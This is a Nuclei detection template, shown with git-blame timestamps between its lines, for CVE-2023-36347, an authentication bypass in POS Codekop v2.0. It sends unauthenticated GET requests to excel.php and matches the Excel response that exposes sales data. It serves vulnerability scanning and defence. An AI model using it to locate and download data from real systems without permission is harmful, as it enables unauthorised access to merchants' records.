2024-05-13 03:43:34 +00:00
|
|
|
id: CVE-2023-36347
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: POS Codekop v2.0 - Broken Authentication
|
|
|
|
author: princechaddha
|
|
|
|
severity: high
|
2024-05-13 07:07:16 +00:00
|
|
|
description: |
|
|
|
|
A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.
|
2024-05-13 03:43:34 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation could lead to unauthorized access to sensitive information.
|
|
|
|
remediation: |
|
|
|
|
Implement proper authentication mechanisms and ensure secure user session management.
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2023-36347
|
|
|
|
cwe-id: CWE-306
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.01502
|
|
|
|
epss-percentile: 0.86929
|
2024-05-13 03:43:34 +00:00
|
|
|
cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:*
|
|
|
|
metadata:
|
|
|
|
vendor: codekop
|
|
|
|
product: codekop
|
|
|
|
tags: cve,cve2023,codekop,pos,auth-bypass
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/excel.php"
|
|
|
|
- "{{BaseURL}}/pos-kasir-php/excel.php"
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "<title>Document"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/vnd.ms-excel"
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 490a0046304402204756644785cf8f6b3401876888de1efa5f00a2e2ce9ffc5e4eacf75cacae41f802200bb338ccebf1d53d196c50f415070a8ad4c488c6dafb66abab734395dd4ca6b2:922c64590222798bb761d5b6d8e72950
|